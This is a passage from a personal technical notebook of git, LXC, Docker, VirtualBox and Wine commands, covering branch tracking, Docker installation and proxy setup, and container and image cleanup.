fatal: The upstream branch of your current branch does not match the name of your current branch.

To push to the upstream branch on the remote, use

    git push origin HEAD:v1.1

To push to the branch of the same name on the remote, use

    git push origin v0.2

Git keeps track of which local branch goes with which remote branch. When you renamed the remote branch, git lost track of which remote goes with your local rc branch. You can fix this using the --set-upstream-to or -u flag for the branch command:

git branch -u origin/rc

https://stackoverflow.com/a/27261804
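To inspect which remote branch each local branch currently tracks:

# each local branch is listed with its upstream (if any) in square brackets
$ git branch -vv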

52.1.38 Abort the merge

# git merge --abort

52.1.39 Track remote branch that doesn’t exist on local

Sometimes a remote branch is not tracked locally, and the branch name does not exist in the local clone. Related error:

Git: cannot checkout branch - error: pathspec did not match any file(s) known to git

$ git branch
master
dev

$ git branch -a

remotes/origin/master
remotes/origin/dev
remotes/origin/rc


$ git remote update
$ git fetch --all
$ git checkout --track remotes/origin/rc

$ git branch
master
rc
dev

52.1.40 Fix git remote fatal: index-pack failed

Traceback:

or@omid:~/ws$ git clone [email protected]:example/example.git
Cloning into 'example'...
remote: Counting objects: 39831, done.
remote: Compressing objects: 100% (16929/16929), done.
Connection to bitbucket.org closed by remote host.
fatal: The remote end hung up unexpectedly
fatal: early EOFs: 99% (39758/39831), 19.57 MiB | 166.00 KiB/s
fatal: index-pack failed

Solution:

$ git config --global core.compression 0
$ git clone --depth 1 [email protected]:example/example.git
# retrieve the rest of the clone
$ git fetch --unshallow
# or, alternately:
$ git fetch --depth=2147483647
$ git pull --all
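Once the clone has completed, the global compression override can be removed again to restore Git's default behavior:

$ git config --global --unset core.compression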

52.2 Hg

CHAPTER 53

Virtualization

Contents:

53.1 LXC

$ sudo lxc-create -t debian -n p1

Checking cache download in /var/cache/lxc/debian/rootfs-wheezy-amd64 ...
Downloading debian minimal ...
Download complete.
Copying rootfs to /var/lib/lxc/p1/rootfs...
Generating locales (this might take a while)...
  en_US.UTF-8... done
Generation complete.
update-rc.d: using dependency based boot sequencing
update-rc.d: using dependency based boot sequencing
update-rc.d: using dependency based boot sequencing
update-rc.d: using dependency based boot sequencing
Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
Creating SSH2 ECDSA key; this may take some time ...
invoke-rc.d: policy-rc.d denied execution of restart.

Current default time zone: 'Asia/Tehran'
Local time is now:      Sun Jun 29 16:51:56 IRDT 2014.
Universal Time is now:  Sun Jun 29 12:21:56 UTC 2014.

Root password is 'root', please change !
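Once created, the container can be started and entered with the standard LXC tools (a sketch; the container name matches the example above, and exact command names and flags can vary between LXC releases):

$ sudo lxc-start -n p1 -d     # boot the container in the background
$ sudo lxc-ls --fancy         # list containers with their state and IP
$ sudo lxc-console -n p1      # attach to its console (Ctrl-a q to detach)
$ sudo lxc-stop -n p1         # shut it down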


53.2 DOCKER

$ docker version
$ docker search repo
$ docker pull username/repo
$ docker run learn/tutorial echo "hello world"
$ docker run learn/tutorial apt-get install -y ping
# shows information about running containers
$ docker ps
# shows information about running and stopped containers
$ docker ps -a
# return the details of the last container started
$ docker ps -l
# create a new container
$ docker run IMAGE_ID CMD PARAMS
# tells Docker to run the container in the background.
$ docker run -d IMAGE_ID
# tell docker to map any ports exposed in our image to our host.
$ docker run -P IMAGE_ID
$ docker run -p 5000:5000 IMAGE_ID
$ docker inspect IMAGE_ID
$ docker run -i -t IMAGE_ID /bin/bash
# Create a new image from a container's changes
$ docker commit CONTAINER_ID IMAGE_NAME
# The -m flag allows us to specify a commit message, much like you would with a commit on a version control system.
$ docker commit CONTAINER_ID IMAGE_NAME -m="COMMIT MESSAGE"
# The -a flag allows us to specify an author for our update
$ docker commit CONTAINER_ID IMAGE_NAME -a="Author Name"
# Examine the processes running inside the container
$ docker top CONTAINER_ID
# restart the old container again
$ docker start CONTAINER_ID
$ docker stop CONTAINER_ID
# Attach to a running container
$ docker attach CONTAINER_ID
# execute a command in a container and keep stdin interactive
$ docker exec -it CONTAINER_ID /bin/bash
# Build an image from a Dockerfile
$ docker build -t IMAGE_TAG_NAME FOLDER_PATH_OF_DOCKER_FILE
# Add a tag to an existing image after you commit or build it.
$ docker tag IMAGE_ID IMAGE_REPOSITORY_NAME:NEW_TAG_NAME
# Remove image from Docker host
$ docker rmi IMAGE_ID
$ docker inspect CONTAINER_ID | grep IPAddress | cut -d '"' -f4
# Narrow down the information we want to return by requesting a specific element
$ docker inspect -f '{{ .NetworkSettings.IPAddress }}' CONTAINER_ID
$ docker logs CONTAINER_ID
# This causes the docker logs command to act like the tail -f command and watch the container's standard out.
$ docker logs -f CONTAINER_ID
# Adding a data volume
$ docker run -i -t -v /HOST/DIRECTORY IMAGE_ID CMD
# Mount a host directory as a data volume using the -v flag
$ docker run -i -t -v /HOST/DIRECTORY:/CONTAINER/DIRECTORY IMAGE_ID CMD
# Docker defaults to a read-write volume but we can also mount a directory read-only.
$ docker run -i -t -v /ONE/PATH/IN/HOST:/ONE/PATH/IN/CONTAINER:ro IMAGE_ID CMD
$ docker images --tree
# Remove all Exited Docker containers
$ docker ps -a | grep Exited | cut -d ' ' -f1 | xargs docker rm
$ docker ps -a | grep Exited | awk '{print $1}' | xargs docker rm
$ docker rm $(docker ps -a -q)
# remove dangling images
$ docker images | grep none | awk '{print $3}' | xargs docker rmi
# remove all images
$ docker rmi $(docker images -q)
# remove container after running
$ docker run --rm -i -t IMAGE_ID CMD

Note: An image can’t have more than 127 layers regardless of the storage driver. This limitation is set globally to encourage optimization of the overall size of images.
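To check how many layers an image currently has (a quick sanity check; IMAGE_ID as in the commands above, and the reported count can differ slightly between storage drivers and Docker versions):

# each non-header line of 'docker history' corresponds to one layer
$ docker history IMAGE_ID
# or ask the image metadata for the filesystem layer count directly
$ docker inspect -f '{{len .RootFS.Layers}}' IMAGE_ID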

53.2.1 Create base kali image http://www.jamescoyle.net/how-to/1503-create-your-first-docker-container

# Install dependencies (debootstrap)
apt-get install debootstrap

# Fetch the latest Kali debootstrap script from git
curl "http://git.kali.org/gitweb/?p=packages/debootstrap.git;a=blob_plain;f=scripts/kali;hb=HEAD" > kali-debootstrap

# Download kali packages
debootstrap kali ./kali-root http://http.kali.org/kali ./kali-debootstrap

# Create image
tar -C kali-root -c . | docker import - kali_base_1.0.9

# Run image
docker run -t -i kali_base_1.0.9 /bin/bash

53.2.2 Install docker on Debian

$ sudo apt-get purge lxc-docker*
$ sudo apt-get purge docker.io*
$ sudo apt-get update
$ sudo apt-get install apt-transport-https ca-certificates
$ sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
$ sudo vim /etc/apt/sources.list.d/docker.list
# On Debian Stretch/Sid
deb https://apt.dockerproject.org/repo debian-stretch main
$ sudo apt-get update
$ sudo apt-cache policy docker-engine
$ sudo apt-get install docker-engine
$ sudo service docker start

https://docs.docker.com/engine/installation/debian/


53.2.3 Install docker on Ubuntu Server https://docs.docker.com/engine/installation/linux/docker-ce/ubuntu/#set-up-the-repository

$ sudo apt-get update
$ sudo apt-get install apt-transport-https ca-certificates curl software-properties-common
$ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
$ sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
$ sudo apt-get update
$ sudo apt-get install docker-ce

53.2.4 Set HTTP Proxy for docker https://docs.docker.com/engine/articles/systemd/#http-proxy

# systemctl status docker | grep Loaded
Loaded: loaded (/lib/systemd/system/docker.service; enabled; vendor preset: enabled)

$ vim /lib/systemd/system/docker.service

Add Environment to docker.service:

[Service]
Environment="HTTP_PROXY=http://127.0.0.1:8080/" "NO_PROXY=localhost,127.0.0.1"

$ sudo systemctl show docker --property Environment
$ sudo systemctl daemon-reload
$ sudo systemctl show docker --property Environment
$ sudo systemctl restart docker

53.2.5 Set HTTP Proxy for docker on Ubuntu 12.04.3 LTS

$ sudo vim /etc/default/docker
export http_proxy="http://PROXY_IP:PROXY_PORT"
$ sudo service docker restart

http://stackoverflow.com/questions/26550360/docker-ubuntu-behind-proxy

53.2.6 How to let a docker container work with sshuttle?

We need -l 0.0.0.0 so that docker containers with a "remote ip" can connect to the tunnel.

$ sshuttle -l 0.0.0.0 -vvr <username>@<sshserver> 0/0

http://stackoverflow.com/a/30837252


53.2.7 How can I use docker without sudo?

$ sudo groupadd docker
$ sudo usermod -a -G docker ${USER}
$ sudo service docker restart
# To avoid logging out and back in again
# to pick up the new docker group permissions in the current bash session:
$ newgrp docker

https://docs.docker.com/engine/installation/debian/
http://askubuntu.com/questions/477551/how-can-i-use-docker-without-sudo

53.2.8 Install Docker Compose

$ sudo su
$ curl -L https://github.com/docker/compose/releases/download/1.9.0/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose
$ sudo chmod +x /usr/local/bin/docker-compose
$ exit
$ docker-compose --version
# docker-compose version 1.9.0, build 2585387

https://docs.docker.com/compose/install/

Dockerfile reference: https://docs.docker.com/engine/reference/builder/

53.2.9 Docker Compose

Reference: https://docs.docker.com/compose/reference/ https://docs.docker.com/compose/compose-file/

53.2.10 Install docker machine

$ apt-get install virtualbox
$ sudo curl -L https://github.com/docker/machine/releases/download/v0.9.0-rc2/docker-machine-`uname -s`-`uname -m` > /usr/local/bin/docker-machine && chmod +x /usr/local/bin/docker-machine
$ docker-machine -v
# docker-machine version 0.6.0-rc4, build a71048c

https://docs.docker.com/machine/install-machine/
https://github.com/docker/machine

53.2.11 How to use docker machine

Docker Machine allows you to provision Docker on virtual machines that reside either on your local system or on a cloud provider.


Docker Machine creates a host on a VM, and you use the Docker Engine client as needed to build images and create containers on that host. If you are tired of installing and configuring a Docker host again and again, docker-machine is there for the rescue: you can leave all of Docker's installation and configuration tasks to it. Docker Machine lets you spin up Docker host VMs locally on your laptop, on a cloud provider (AWS, Azure, etc.) or in your private data center (OpenStack, vSphere, etc.). Beyond host provisioning, you can also use docker-machine to deploy and manage containers on the individual hosts. First, ensure that the latest VirtualBox is correctly installed on your system.

$ docker-machine ls
$ docker-machine create --driver virtualbox
$ docker-machine create --driver virtualbox default
# (default) Boot2Docker v1.9.1 has a known issue with AUFS.
# (default) See here for more details: https://github.com/docker/docker/issues/18180
# (default) Consider specifying another storage driver (e.g. 'overlay') using '--engine-storage-driver' instead.
$ docker-machine create --engine-storage-driver overlay --driver virtualbox default
$ docker-machine env
# export DOCKER_TLS_VERIFY="1"
# export DOCKER_HOST="tcp://192.168.99.100:2376"
# export DOCKER_CERT_PATH="/home/or/.docker/machine/machines/default"
# export DOCKER_MACHINE_NAME="default"
# # Run this command to configure your shell:
# # eval $(docker-machine env default)
$ eval $(docker-machine env default)
$ docker ps
$ docker images
$ docker-machine stop
$ docker-machine restart
$ docker-machine start
$ docker history IMAGE_ID

https://docs.docker.com/machine/
https://docs.docker.com/machine/get-started/
https://docs.docker.com/machine/drivers/
https://docs.docker.com/machine/reference/
https://docs.docker.com/machine/get-started-cloud/
http://devopscube.com/docker-machine-tutorial-getting-started-guide/

53.2.12 Docker toolbox

https://www.docker.com/products/docker-toolbox

53.2.13 Others:

https://dzone.com/articles/how-ansible-and-docker-fit

https://github.com/erroneousboat/docker-django

53.2.14 Docker misconceptions https://valdhaus.co/writings/docker-misconceptions/

53.2.15 Service orchestration and management tool

Service discovery

https://github.com/hashicorp/serf
https://github.com/coreos/etcd
https://zookeeper.apache.org/
https://www.ansible.com/orchestration
https://blog.docker.com/tag/orchestration/

53.2.16 Docker on multi host https://blog.docker.com/2015/11/docker-multi-host-networking-ga/ https://docs.docker.com/engine/extend/plugins/ https://www.weave.works/i-just-created-a-cassandra-cluster-that-spans-3-different-network-domains-by-using-2-simple-shell-commands-how-cool-is-that/ https://blog.docker.com/2015/11/docker-multi-host-networking-ga/ An overlay network Docker’s overlay network driver supports multi-host networking natively out-of-the-box. This support is accomplished with the help of libnetwork, a built-in VXLAN-based overlay network driver, and Docker’s libkv library. https://docs.docker.com/engine/userguide/networking/dockernetworks/ Docker Engine supports multi-host networking out-of-the-box through the overlay network driver. Unlike bridge networks, overlay networks require some pre-existing conditions before you can create one. These conditions are: Access to a key-value store. Docker supports Consul, Etcd, and ZooKeeper (Distributed store) key-value stores. A cluster of hosts with connectivity to the key-value store. A properly configured Engine daemon on each host in the cluster. Hosts within the cluster must have unique hostnames because the key-value store uses the hostnames to identify cluster members. https://docs.docker.com/engine/userguide/networking/get-started-overlay/ https://github.com/dave-tucker/docker-network-demos/blob/master/multihost-local.sh https://www.auzias.net/en/docker-network-multihost/ http://stackoverflow.com/questions/34262182/docker-multi-host-networking-cluster-advertise-option


53.2.17 docker machine https://docs.docker.com/machine/get-started-cloud/ https://docs.docker.com/machine/drivers/ http://devopscube.com/docker-machine-tutorial-getting-started-guide/

53.2.18 How to run a command on an already existing docker container?

If the container is stopped and can't be started due to an error, you'll need to commit it. Then you can launch bash in the resulting image:

$ docker commit CONTAINER_ID temporary_image
$ docker run -it temporary_image /bin/bash

53.2.19 Removing Docker data volumes? http://serverfault.com/a/738721

$ du -h --max-depth=1 /var/lib/docker | sort -hr
$ docker volume rm $(docker volume ls -qf dangling=true)

53.2.20 Clear log history

$ vim docker-logs-clean.sh

#!/bin/bash
for container_id in $(docker ps -a --filter="name=$name" -q); do
    # Look up the path of the container's JSON log file
    file=$(docker inspect $container_id | grep -G '"LogPath": "*"' | sed -e 's/.*"LogPath": "//g' | sed -e 's/",//g')
    if [ -f "$file" ]; then
        rm "$file"
    fi
done

$ chmod +x docker-logs-clean.sh
$ sudo ./docker-logs-clean.sh

https://github.com/docker/compose/issues/1083#issuecomment-216540808

53.2.21 Set maximum concurrent download for docker pull

$ sudo vim /lib/systemd/system/docker.service

[Service]
ExecStart=/usr/bin/dockerd -H fd:// --max-concurrent-downloads 1



$ sudo systemctl daemon-reload
$ systemctl restart docker

53.2.22 Override the ENTRYPOINT using docker run

docker run -it --entrypoint "/bin/bash" --rm -v "$PWD":/ws/omr/ lsakalauskas/sdaps

53.2.23 Set image name when building a custom image

$ docker build -t image_name .

53.2.24 Set environment variables during the build in docker

FROM ubuntu:18.04
# declare the build-time variable before the RUN instruction that should see it
ARG DEBIAN_FRONTEND=noninteractive
RUN apt-get update

ARG sets variables that are only available during the docker build process; they are not present in the final image.
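A quick way to confirm this (the arg-demo image tag is illustrative): build the image, then look for the variable in a running container; it should not appear.

$ docker build -t arg-demo .
$ docker run --rm arg-demo env | grep DEBIAN_FRONTEND   # prints nothing
# the default can also be overridden per build:
$ docker build --build-arg DEBIAN_FRONTEND=noninteractive -t arg-demo .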

53.2.25 Remove unused, dangling, untagged docker images

$ docker image prune -f

https://docs.docker.com/engine/reference/commandline/image_prune/#usage

53.2.26 Disable auto-restart on a container

$ docker update --restart=no container-id

53.2.27 Minimal base docker OS images

• https://registry.hub.docker.com/_/ubuntu/ • https://registry.hub.docker.com/u/library/debian/ • https://registry.hub.docker.com/_/busybox/ • https://registry.hub.docker.com/_/centos/ • https://registry.hub.docker.com/_/fedora/ • https://registry.hub.docker.com/_/alpine/ • https://registry.hub.docker.com/_/cirros/ • https://hub.docker.com/_/python/ • https://github.com/GoogleContainerTools/distroless

https://www.brianchristner.io/docker-image-base-os-size-comparison/

$ docker pull python:3.6-alpine
$ docker images | grep -i python
# python    3.6-alpine    cb04a359db13    3 days ago    74.3MB

https://github.com/docker-library/python

$ docker pull gcr.io/distroless/python3
$ docker images | grep -i distroless
# gcr.io/distroless/python3    latest    523f07cec1e2    49 years ago    50.9MB

Note that there is no `docker exec(run) -it ...` shell in a distroless image.

https://github.com/GoogleContainerTools/distroless

Links:

https://medium.com/c0d1um/building-django-docker-image-with-alpine-32de65d2706
https://www.caktusgroup.com/blog/2017/03/14/production-ready-dockerfile-your-python-django-app/

53.3 Virtual box

53.3.1 Install latest version

$ sudo apt-get purge virtualbox-\*
# download the .deb package from https://www.virtualbox.org/wiki/Linux_Downloads
$ wget <virtualbox-package-url>
$ sudo dpkg -i <virtualbox-package.deb>

53.3.2 Uninstall running virtualbox

$ sudo service vboxdrv stop
$ ps aux | grep VBoxSVC
$ pidof VBoxSVC
$ sudo kill -9 7811
$ sudo apt-get purge virtualbox-\*

53.4 Wine

53.4.1 Wine PATH through command line

$ export WINEPATH=/new/path/

Wine CMD Version 5.1.2600 (1.6.2)
C:\>echo %PATH%
/new/path/;C:\windows\system32;C:\windows;

https://stackoverflow.com/a/33220534

CHAPTER 54

Indices and tables

• genindex
• search
